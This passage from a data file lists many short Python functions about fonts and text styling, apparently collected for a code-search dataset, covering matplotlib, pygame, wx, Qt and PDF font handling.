headline_font = ('Arial bold', 20)\r\n font = ('Arial', 20)\r\n warning_font = ('Arial bold', 14)\r\n button_font = ('Arial', 14)\r\n\r\n return headline_font, font, warning_font, button_font", "def get_font_options(self): # real signature unknown; restored from __doc__\n pass", "def resetDefaults(self):\n self.client.SetFont(wx.Font(10,wx.SWISS,wx.NORMAL,wx.NORMAL))\n self.client.SetFontSizeAxis(10)\n self.client.SetFontSizeLegend(7)\n self.client.setLogScale((False,False))\n self.client.SetXSpec('auto')\n self.client.SetYSpec('auto')", "def fontDialog(*args, FontList: bool=True, scalable: bool=True, **kwargs)->AnyStr:\n pass", "def initDefaults(self):\n return _libsbml.TextGlyph_initDefaults(self)", "def set_font(self, font):\n\tself.m_font = font", "def load_font(fontSize):\n f1='/usr/share/fonts/corefonts/arialbd.ttf' \n f2='/usr/share/fonts/truetype/msttcorefonts/Arial_Bold.ttf'\n if os.path.isfile(f1): font=ImageFont.truetype(f1,fontSize)\n if os.path.isfile(f2): font=ImageFont.truetype(f2,fontSize)\n return font", "def adjusting_fonts(self):\n fix_x = int(0 * settings.scale)\n fix_y = int(0 * settings.scale)\n font_object = self.fontA\n box = self.box\n text_box = self.box.get_size()\n text_list = self.text.split()\n number_of_words = len(text_list)\n count = 0\n height = fix_y\n first = True\n line = \"\"\n line_break = False\n while count < number_of_words:\n line += text_list[count]\n line_size = font_object.size(line)\n line_pos = int((text_box[0] + fix_x - line_size[0]) / 2)\n if line_size[0] < text_box[0]:\n if count + 1 < number_of_words:\n temporary_line = line + \" \" + text_list[count + 1]\n if font_object.size(temporary_line)[0] >= text_box[0]:\n line_image = font_object.render(line, 1, self.color)\n height += int((line_size[1] * 0.8))\n box.blit(line_image, (line_pos, height))\n line = \"\"\n else:\n line += \" \"\n elif count + 1 == number_of_words:\n height += int((line_size[1] * 0.8))\n box.blit(\n font_object.render(line, 1, self.color), (line_pos, height)\n )\n else:\n line = text_list[count]\n height += int(\n line_size[1] * 0.8\n ) # If line height is perfect it does not seem that it is the same text\n count += 1", "def get_font_at_size(fonts_path, font_name, initial_font_size, text_to_print, target_width):\n font_size = initial_font_size\n while True:\n font = ImageFont.truetype(path.join(fonts_path, font_name), font_size)\n text_width = font.getsize(text_to_print)[0]\n if text_width <= target_width:\n break\n if font_size < 9:\n break\n font_size = font_size - 1\n return font", "def set_font(s: Optional[int] = 14, reset: Optional[bool] = False) -> None:\n if reset:\n plt.rcParams.update(plt.rcParamsDefault)\n plt.rcParams[\"figure.figsize\"] = [20, 10]\n # plt.rcParams['font.family'] = 'serif'\n # plt.rcParams['font.serif'] = ['Times New Roman'] + plt.rcParams['font.serif']\n plt.rc('font', size=s) # controls default text sizes\n plt.rc('axes', titlesize=s) # fontsize of the axes title\n plt.rc('axes', labelsize=s) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=s - 2) # fontsize of the tick labels\n plt.rc('ytick', labelsize=s - 2) # fontsize of the tick labels\n plt.rc('legend', fontsize=s) # legend fontsize\n plt.rc('figure', titlesize=s + 2) # fontsize of the figure title", "def setCommonFonts(windows=None):\n f = setFont('fontNormal', family=cfgFontName, size=cfgFontSize)\n aliasFont('fontButton', 'fontNormal')\n fb = setFont('fontBold', family=cfgFontName, size=cfgFontSize, weight='bold')\n fi = setFont('fontItalic', family=cfgFontName, size=cfgFontSize, slant='italic')\n setFont('fontLabel', family=cfgFontName, size=cfgFontSize+1, weight='bold')\n if windows:\n windows.fontBig = tkFont.Font(size=cfgFontSize+2, family=cfgFontName, weight='bold')\n windows.font = f\n windows.fontBold = fb\n windows.fontItalic = fi", "def font(self):\n\treturn self.m_font", "def font(self):\n\treturn self.m_font", "def update_editor ( self ):\n super( TextFontEditor, self ).update_editor()\n set_font( self )", "def set_default(self):\n self.online()\n self.justify('L')\n self.inverse_off()\n self.double_height_off()\n self.set_line_height(30)\n self.bold_off()\n self.underline_off()\n self.set_barcode_height(50)\n self.set_size('s')\n self.set_charset(0)\n self.set_code_page(0)", "def _font(self):\n\treturn self.m_gdfont", "def adjust_matplotlib_settings():\n font = {\"weight\": \"bold\", \"size\": 22, \"family\": \"sans-serif\"}\n matplotlib.rc(\"font\", **font)\n matplotlib.rc(\"text\", usetex=True)\n matplotlib.rcParams[\"mathtext.fontset\"] = \"dejavusans\"", "def update_editor ( self ):\n font = self.factory.to_wx_font( self )\n try:\n self._facename.SetStringSelection( font.GetFaceName() )\n except:\n self._facename.SetSelection( 0 )\n try:\n self._point_size.SetStringSelection( str( font.GetPointSize() ) )\n except:\n self._point_size.SetSelection( 0 )\n font.SetPointSize( min( 10, font.GetPointSize() ) )\n self._font.SetValue( self.str_value )\n self._font.SetFont( font )", "def adjustTitleFont( self ):\n if ( self._titleFont ):\n return\n \n m = self.contentsMargins()\n w = self.rect().width() - (m[0] + m[2] + self.roundingRadius() * 2)\n \n if ( not w ):\n return\n \n font = QApplication.font()\n text = self.displayName()\n if not self.wordWrap() or projex.text.wordcount(text) == 1:\n metrics = QFontMetrics(font)\n \n while ( w < metrics.width(text) ):\n new_size = font.pointSize() - 1\n if ( new_size <= 5 ):\n break\n \n font.setPointSize(new_size)\n metrics = QFontMetrics(font)\n \n self._titleFont = font", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", "def set_font_size():\n SMALLER_SIZE = 10\n MED_SIZE = 12\n BIG_SIZE = 18\n\n # plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=MED_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MED_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALLER_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALLER_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=MED_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIG_SIZE) # fontsize of the figure title", "def setX11Font(font='default', ending='STANDARD'):\n if font == 'default':\n font = '-Adobe-Times-Bold-R-Normal-' \n dislin.x11fnt(font,ending)", "def loadSystemFont(name, size):\n\n try:\n f = pygame.font.SysFont(name,size)\n except error, message:\n print \"Cannot load font: \", name\n raise SystemExit, message\n return f", "def init_text(self):\n d = self.declaration\n if d.text:\n self.set_text(d.text)\n if d.text_color:\n self.set_text_color(d.text_color)\n if d.text_alignment:\n self.set_text_alignment(d.text_alignment)\n if d.font_family or d.text_size:\n self.refresh_font()\n if hasattr(d, 'max_lines') and d.max_lines:\n self.set_max_lines(d.max_lines)", "def asNormal(self):\n\t\treturn TextFont( self.name[0:2], self.size)", "def main(argv):\n correct_font(*argv[1:])", "def set_default_style(self):\r\n self.font.setBold(False)\r\n self.setFont(self.font)\r\n self.setStyleSheet(\"\")\r\n self.show_tip()", "def set_fonts(cls, fonts={}):\n for font in fonts:\n if font not in cls._fonts:\n cls._fonts[font] = _Font()\n cls._fonts[font].replace(cls._create_font(fonts[font], 16))\n\n if not cls._fonts[\"widget\"]:\n cls._fonts[\"widget\"].replace(cls._create_font(\"Arial\", 16))\n if not cls._fonts[\"title\"]:\n name = fonts[\"widget\"] if (\"widget\" in fonts) else \"Arial\"\n cls._fonts[\"title\"].replace(cls._create_font(name, 30))\n if not cls._fonts[\"mono\"]:\n cls._fonts[\"mono\"].replace(cls._create_font(\n \"Ubuntu Mono, FreeMono, Monospace\", 16))\n\n #if SCREEN._opengl:\n # cls.mono_w = cls[\"mono\"].font.Advance(\"e\")\n #else:\n cls.mono_w = cls[\"mono\"].render(\"e\", False, (0,0,0)).get_width()", "def update_editor ( self ):\n super( SimpleFontEditor, self ).update_editor()\n set_font( self )", "def get_text_font ( self, object ):\n if self._is_selected( object ):\n return self.selected_text_font\n return self.text_font", "def SetMeasuringFont(self, font):\r\n\r\n self.GetArtProvider().SetMeasuringFont(font)", "def setFont(fontKey, update=False, **opts):\n if not hasFont(fontKey) or update:\n globals()[fontKey] = tkFont.Font(**opts)\n \n return globals()[fontKey]", "def askopenfont(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def rec_default(self):\n self.shrink_wrap_triggers.setText('(1,1)')\n self.shrink_wrap_type.setText('GAUSS')\n self.sigma.setText('1.0')\n self.threshold.setText('0.1')", "def getfont(self):\r\n if self.font is None:\r\n self.font = cv2.FONT_HERSHEY_SIMPLEX\r\n return self.font", "def test_calls_config(\n self, mock_font):\n root = Tk()\n custom = mock_font(root, family='Helvetica', size=12)\n fontSelect.font_style(custom, 'Times')\n custom.config.assert_called_with(family='Times')", "def setFont(self, font):\n self.edit.document().setDefaultFont(font)\n self.edit.setFont(font)\n super(BaseConsole, self).setFont(font)", "def _get_font_descriptor(self) -> dict:\n self._base_font = self.font['name'].names[6].toStr()\n head = self.font[\"head\"]\n self.units_per_em = head.unitsPerEm\n scale = 1000 / self.units_per_em\n xMax = head.xMax * scale\n xMin = head.xMin * scale\n yMin = head.yMin * scale\n yMax = head.yMax * scale\n\n hhea = self.font.get('hhea')\n\n if hhea:\n ascent = hhea.ascent * scale\n descent = hhea.descent * scale\n\n os2 = self.font.get('OS/2')\n\n if os2:\n usWeightClass = os2.usWeightClass\n fsType = os2.fsType\n if (fsType == 0x0002 or (fsType & 0x0300) != 0):\n error = 'Font file in {} has copyright restrictions.'\n raise Exception(error.format(self.filename))\n\n if hhea is None:\n ascent = os2.sTypoAscender * scale\n descent = os2.sTypoDescender * scale\n capHeight = os2.sCapHeight * scale if os2.version > 1 else ascent\n else:\n usWeightClass = 500\n if hhea is None:\n ascent = yMax\n descent = yMin\n capHeight = self.ascent\n\n stemV = 50 + int(pow((usWeightClass / 65.0),2))\n\n post = self.font['post']\n italicAngle = post.italicAngle\n\n flags = 4\n if (italicAngle!= 0):\n flags = flags | 64\n if (usWeightClass >= 600):\n flags = flags | 262144\n if (post.isFixedPitch):\n flags = flags | 1\n\n return {\n 'Type': b'/FontDescriptor',\n 'FontName': subs('/{}', self.base_font),\n 'Flags': flags,\n 'FontBBox': [xMin, yMin, xMax, yMax],\n 'ItalicAngle': italicAngle,\n 'Ascent': ascent,\n 'Descent': descent,\n 'CapHeight': capHeight,\n 'StemV': stemV\n }", "def set_font(self, font):\n this.font = font\n # Signal to the application that we need a resize\n this.chsize()", "def update_editor ( self ):\n super( ReadonlyFontEditor, self ).update_editor()\n set_font( self )", "def set_font(self, font, option):\n # Update fonts in all plugins\n set_font(font, option=option)\n plugins = self.main.widgetlist + self.main.thirdparty_plugins\n for plugin in plugins:\n plugin.update_font()", "def get_font(self, option):\n return get_font(option=option)", "def font(size=20, name=None):\n name = name or \"regular\"\n path = ROOT_DIR / \"wclib\" / \"assets\" / (name + \".ttf\")\n return pygame.font.Font(path, size)", "def parse_fontsize(size=None, default=None):\n if size is not None:\n return size\n elif _is_default_matplotlibrc():\n return default\n else:\n return None", "def set_fontsizes(sizes=None):\n if sizes is None:\n SMALL_SIZE = 8\n MEDIUM_SIZE = 10\n BIGGER_SIZE = 12\n elif isinstance(sizes, int):\n SMALL_SIZE = sizes\n MEDIUM_SIZE = sizes\n BIGGER_SIZE = sizes\n else:\n SMALL_SIZE = sizes[0]\n MEDIUM_SIZE = sizes[1]\n BIGGER_SIZE = sizes[2]\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title", "def initialize():\n #carga las fuente del usuario\n for family in USER_FONTS:\n for font in USER_FONTS[family]:\n name, path = USER_FONTS[family][font]\n pdfmetrics.registerFont(TTFont(name, path))", "def shell_font_changed(self, font):\n self.set_font(font)", "def render_defaults(stdscr):\n max_y = stdscr.getmaxyx()[0] - 1\n if superglobals.information_enabled:\n stdscr.addstr(0, 0, uname().system)\n stdscr.addstr(1, 0, uname().machine)\n \n for i in range(0, max_y + 1):\n stdscr.addstr(i, 43, \"│\") # Barrier that protects program from user input.", "def setupStyling(self):\n\n\t\tfaces = {\n\t\t\t'times': 'Times New Roman',\n\t\t\t'mono' : 'Courier New',\n\t\t\t'helv' : 'Arial',\n\t\t\t'other': 'Comic Sans MS',\n\t\t\t'size' : 10,\n\t\t\t'size2': 8,\n\t\t}\n\n\t\tself.edit.StyleSetSpec(stc.STC_STYLE_DEFAULT, \"back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleClearAll()\n\t\tself.edit.StyleSetSpec(stc.STC_STYLE_LINENUMBER, \"fore:#928374,back:#212121,face:%(mono)s,size:%(size2)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.TEXT, \"fore:#d5c4a1,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HEADING, \"fore:#EFCD1E,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HIDDEN, \"fore:#d5c4a1,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODE, \"fore:#b8bb26,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.SYMBOL, \"fore:#81ac71,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.TEST, \"fore:#ff00ff,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.STRIKE, \"fore:#e44533,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.BOLD, \"fore:#d9a62e,bold,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.UNDERLINE, \"fore:#d9a62e,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.ITALIC, \"fore:#7d9d90,italic,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.IMAGE, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.IMAGE_UNDERLINED, \"fore:#cb8296,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.LINK, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.LINK_UNDERLINED, \"fore:#cb8296,underline,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HTML, \"fore:#cb8296,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.HTML_ATTRIBUTE, \"fore:#d9a62e,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.FORMAT, \"fore:#e44533,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.COMMENT, \"fore:#928372,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_KEYWORD, \"fore:#569cd6,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_SYMBOL, \"fore:#9cdcfe,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_TEXT, \"fore:#F9FFE0,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_STRING, \"fore:#d69d73,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_COMMENT, \"fore:#57a64a,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_FUNCTION, \"fore:#4ec9b0,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_CLASS, \"fore:#4ec9b0,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_TYPE, \"fore:#EFCD1E,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_FLOW, \"fore:#d8a0df,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.StyleSetSpec(STYLE.CODEBLOCK_DIGIT, \"fore:#b5ce92,back:#282828,face:%(mono)s,size:%(size)d\" % faces)\n\t\tself.edit.IndicatorSetStyle(0, stc.STC_INDIC_SQUIGGLE)\n\t\tself.edit.IndicatorSetForeground(0, wx.RED)", "def system_font_demo(my_canvas, fonts):\n pos_y = 750\n for font in fonts:\n try:\n ttf = TTFont(font, fonts[font])\n except:\n # Skip this font\n continue\n\n pdfmetrics.registerFont(ttf)\n\n my_canvas.setFont(font, 12)\n my_canvas.drawString(30, pos_y, font)\n pos_y -= 10\n if pos_y < 40:\n my_canvas.showPage()\n pos_y = 750", "def font(self):\n return self[\"font\"]", "def font(self):\n return self[\"font\"]", "def font(self):\n return self[\"font\"]", "def selectFont():\n font,ok = QtGui.QFontDialog.getFont()\n if ok:\n return font\n else:\n return None", "def getFontFromParams(self,\n family: str, size: str, slant: str, weight: str, defaultSize: int = 12, tag = '',\n ) -> Any:\n if isinstance(size, str):\n if size.endswith('pt'):\n size = size[:-2].strip()\n elif size.endswith('px'):\n if size not in self.size_warnings:\n self.size_warnings.append(size)\n g.es(f\"px ignored in font setting: {size}\")\n size = size[:-2].strip()\n try:\n i_size = int(size)\n except Exception:\n i_size = 0\n if i_size < 1:\n i_size = defaultSize\n d = {\n 'black': Weight.Black,\n 'bold': Weight.Bold,\n 'demibold': Weight.DemiBold,\n 'light': Weight.Light,\n 'normal': Weight.Normal,\n }\n weight_val = d.get(weight.lower(), Weight.Normal)\n italic = slant == 'italic'\n if not family:\n family = 'DejaVu Sans Mono'\n try:\n font = QtGui.QFont(family, i_size, weight_val, italic)\n if sys.platform.startswith('linux'):\n try:\n font.setHintingPreference(font.PreferFullHinting)\n except AttributeError:\n pass\n return font\n except Exception:\n g.es_print(\"exception setting font\", g.callers(4))\n g.es_print(\n f\"family: {family}\\n\"\n f\" size: {i_size}\\n\"\n f\" slant: {slant}\\n\"\n f\"weight: {weight}\")\n # g.es_exception() # Confusing for most users.\n return None", "def set_matplotlib_font_size(SMALL_SIZE = 8, MEDIUM_SIZE = 10, BIGGER_SIZE = 12):\n\n plt.rc('font', size=SMALL_SIZE) # controls default text sizes\n plt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\n plt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\n plt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\n plt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\n plt.rc('figure', titlesize=BIGGER_SIZE) # fontsize of the figure title", "def _create_font(cls, font, size):\n if font[-4:] in (\".ttf\", \".otf\"):\n return pygame.font.Font(font, size)\n else:\n return pygame.font.SysFont(font, size)", "def setPSFont(font='default'):\n if font == 'default':\n font = 'Times-Roman'\n dislin.psfont(font)", "def largest_font_that_fits(draw, font_file, text, cover_width):\n text_w = cover_width + 1\n font_size = 110\n padding = 20\n while(text_w + padding > cover_width):\n font_size -= 10\n font = ImageFont.truetype(font_file, font_size)\n text_w, text_h = draw.textsize(text, font)\n return font", "def seq_display_settings(self):\n # Open a new window for setting the restriction enzymes\n\n self.seq_display_setupwin=Toplevel()\n self.seq_display_setupwin.geometry('+300+450')\n self.seq_display_setupwin.title('Sequence Display Setup')\n\n # Spacing between bases\n row=1\n lblspace=Label(self.seq_display_setupwin,text='Bases Spacing:')\n lblspace.grid(row=row,column=0,padx=3,pady=2)\n bscaleentry=Scale(self.seq_display_setupwin,from_=8,to=20,resolution=1,orient='horizontal',\n relief='ridge',variable=self.base_scale,label='scale factor')\n bscaleentry.grid(row=row,column=1, sticky='wens', padx=3,pady=2)\n row=2\n lblfont=Label(self.seq_display_setupwin,text='Seq Font:')\n lblfont.grid(row=row,column=0,padx=3,pady=2)\n fontentry_button=Menubutton(self.seq_display_setupwin,textvariable=self.seqfont,\n\t\t\t\t\trelief=RAISED,width=16)\n restr_fontentry_button=Menubutton(self.seq_display_setupwin,textvariable=self.restr_font,\n\t\t\t\t\trelief=RAISED,width=16)\n fontentry_menu=Menu(fontentry_button,tearoff=0)\n restr_fontentry_menu=Menu(restr_fontentry_button,tearoff=0)\n fontentry_button['menu']=fontentry_menu\n restr_fontentry_button['menu']=restr_fontentry_menu\n\n # Other fonts available\n fts=['Arial','Courier','Verdana','Fixed','Times']\n for text in fts:\n #text='Font '+text\n fontentry_menu.add_radiobutton(label=text,\n variable=self.seqfont,\n value=text,\n indicatoron=1)\n restr_fontentry_menu.add_radiobutton(label=text,\n variable=self.restr_font,\n value=text,\n indicatoron=1)\n fontentry_button.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n\n row=3\n lblfontsize=Label(self.seq_display_setupwin,text='Sequence Font Size:')\n lblfontsize.grid(row=row,column=0,padx=3,pady=2)\n fontsizeentry=Scale(self.seq_display_setupwin,from_=8,to=20,resolution=1,orient='horizontal',\n relief='ridge',variable=self.seqfontsize)\n\n fontsizeentry.grid(row=row,column=1, sticky='wens',padx=3,pady=2)\n row=4\n frame = Frame(self.seq_display_setupwin)\n fontstyle_label = Label(frame, text='Font Style:')\n fontstyle_label.grid(row=0,column=0)\n fontstyle = Radiobutton(frame, text=\"plain\", variable=self.fontstyle, value=0)\n fontstyle1 = Radiobutton(frame, text=\"bold\", variable=self.fontstyle, value=1)\n fontstyle2 = Radiobutton(frame, text=\"italic\", variable=self.fontstyle, value=2)\n fontstyle.grid(row=0,column=1)\n fontstyle1.grid(row=0,column=2)\n fontstyle2.grid(row=0,column=3)\n frame.grid(row=row,column=0,columnspan=2,sticky='news', padx=3,pady=2)\n\n row=5\n self.backgrcolorbutton = Button(self.seq_display_setupwin, text='background color',\n bg=self.backgrcolor.get(),\n command=self.setbackgrcolor)\n self.backgrcolorbutton.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n row=6\n restrfont=Label(self.seq_display_setupwin,text='Restr. Site Font:')\n restrfont.grid(row=row,column=0,padx=3,pady=2)\n restr_fontentry_button.grid(row=row,column=1, sticky='nes', padx=3,pady=2)\n row=7\n\n # Apply Button\n b = Button(self.seq_display_setupwin, text=\"Apply Settings\", command=self.update_window_formatting)\n b.grid(row=row,column=1,sticky='wens',padx=4,pady=4)\n\n # Close button\n c=Button(self.seq_display_setupwin,text='Close',command=self.close_seq_display_setupwin)\n c.grid(row=row,column=0,sticky='wens',padx=4,pady=4)\n\n # Save Settings button\n row=8\n c=Button(self.seq_display_setupwin,text='Save as Default',command=self.save_preferences)\n c.grid(row=row,column=0,columnspan=2,sticky='wens',padx=4,pady=4)\n return", "def initDefaults(self):\n return _libsbml.GeneralGlyph_initDefaults(self)", "def generate_fonts_doc() -> None:\n text = 'pygame menu'\n save_font_image(pygame_menu.font.FONT_8BIT, text, '_static/font_8bit.png')\n save_font_image(pygame_menu.font.FONT_BEBAS, text, '_static/font_bebas.png')\n save_font_image(pygame_menu.font.FONT_COMIC_NEUE, text, '_static/font_comic_neue.png')\n save_font_image(pygame_menu.font.FONT_DIGITAL, text, '_static/font_digital.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE, text, '_static/font_firacode.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_BOLD, text, '_static/font_firacode_bold.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_BOLD_ITALIC, text, '_static/font_firacode_bold_italic.png')\n save_font_image(pygame_menu.font.FONT_FIRACODE_ITALIC, text, '_static/font_firacode_italic.png')\n save_font_image(pygame_menu.font.FONT_FRANCHISE, text, '_static/font_franchise.png')\n save_font_image(pygame_menu.font.FONT_HELVETICA, text, '_static/font_helvetica.png')\n save_font_image(pygame_menu.font.FONT_MUNRO, text, '_static/font_munro.png')\n save_font_image(pygame_menu.font.FONT_NEVIS, text, '_static/font_nevis.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS, text, '_static/font_open_sans.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_BOLD, text, '_static/font_open_sans_bold.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_ITALIC, text, '_static/font_open_sans_italic.png')\n save_font_image(pygame_menu.font.FONT_OPEN_SANS_LIGHT, text, '_static/font_open_sans_light.png')\n save_font_image(pygame_menu.font.FONT_PT_SERIF, text, '_static/font_pt_serif.png')", "def SetFont(self, font):\r\n \r\n if self._header_win:\r\n self._header_win.SetFont(font)\r\n self.CalculateAndSetHeaderHeight()\r\n self._header_win.Refresh()\r\n \r\n if self._main_win:\r\n return self._main_win.SetFont(font)\r\n else:\r\n return False", "def loadCustomFont(path,name,size):\n\n fullname = os.path.join(path,name)\n f = pygame.font.Font(fullname,size)\n return f", "def GetFont(self, id):\r\n \r\n if id == AUI_DOCKART_CAPTION_FONT:\r\n return self._caption_font\r\n \r\n return wx.NullFont", "def SetNormalFont(self, font):\r\n \r\n self._normal_font = font", "def AdjustFontSize(self):\r\n self.sh.Columns(\"A\").Delete()", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n preferenceNode['ScriptEditorFont'].setValue(font)\n preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def get_fonts():\r\n return pygame.font.get_fonts()", "def SetMeasuringFont(self, font):\r\n \r\n self._measuring_font = font", "def apply_web_specific_fixes(font, unhinted, family_name):\n # Set OS/2 table values to old values\n os2 = font['OS/2']\n os2.sTypoAscender = 1536\n os2.sTypoDescender = -512\n os2.sTypoLineGap = 102\n os2.usWinAscent = 1946\n os2.usWinDescent = 512\n apply_web_cros_common_fixes(font, unhinted, family_name)", "def SetFont(self, font): \r\n\r\n res = wx.PyControl.SetFont(self, font)\r\n\r\n if self._art:\r\n self._art.SetFont(font)\r\n \r\n return res", "def set_font_size(fig):\n fig.title.text_font_size = FONT_SIZE\n fig.xaxis.axis_label_text_font_size = FONT_SIZE\n fig.yaxis.axis_label_text_font_size = FONT_SIZE\n fig.xaxis.major_label_text_font_size = FONT_SIZE\n fig.yaxis.major_label_text_font_size = FONT_SIZE\n fig.legend.label_text_font_size = FONT_SIZE", "def comdlg32_ChooseFont(jitter, get_str, set_str):\n ret_ad, args = jitter.func_args_stdcall([\"lpcf\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def init():\n global _default_foreground, _default_background, _default_style\n try:\n attrs = GetConsoleScreenBufferInfo().wAttributes\n except (ArgumentError, WindowsError):\n _default_foreground = GREY\n _default_background = BLACK\n _default_style = NORMAL\n else:\n _default_foreground = attrs & 7\n _default_background = (attrs >> 4) & 7\n _default_style = attrs & BRIGHT", "def SetNormalFont(self, font):\r\n\r\n self._art.SetNormalFont(font)", "def _get_font_button(field_size):\r\n font_size = int(field_size * 2) # calculates font's size\r\n return pygame.font.SysFont(None, font_size) # returns font\r", "def test_default_run_ubuntu():\n test_dir = os.path.join(\"tests\", \"test_files\", \"fonts\", \"temp\")\n notouch_inpath = os.path.join(\"tests\", \"test_files\", \"fonts\", \"Ubuntu-Regular.ttf\")\n test_inpath = os.path.join(\n \"tests\", \"test_files\", \"fonts\", \"temp\", \"Ubuntu-Regular.ttf\"\n )\n test_outpath = os.path.join(\n \"tests\", \"test_files\", \"fonts\", \"temp\", \"Ubuntu-Regular-dehinted.ttf\"\n )\n test_args = [test_inpath]\n\n # setup\n if os.path.isdir(test_dir):\n shutil.rmtree(test_dir)\n os.mkdir(test_dir)\n shutil.copyfile(notouch_inpath, test_inpath)\n\n # execute\n run(test_args)\n\n # test\n font_validator(test_outpath)\n\n # tear down\n shutil.rmtree(test_dir)", "def rec_default(self):\n self.generations.setText('5')\n self.metrics.setText('(\"chi\",\"chi\",\"area\",\"chi\",\"sharpness\")')\n self.breed_modes.setText('(\"sqrt_ab\",\"sqrt_ab\",\"avg_ab\",\"max_ab_pa\",\"sqrt_ab\")')\n self.removes.setText('(2,2,1)')\n self.ga_support_thresholds.setText('(.1,.1,.1,.1,.1)')\n self.ga_support_sigmas.setText('(1.0,1.0,1.0,1.0)')\n self.lr_sigmas.setText('(2.0,1.5)')\n self.gen_pcdi_start.setText('3')\n self.active.setChecked(True)", "def 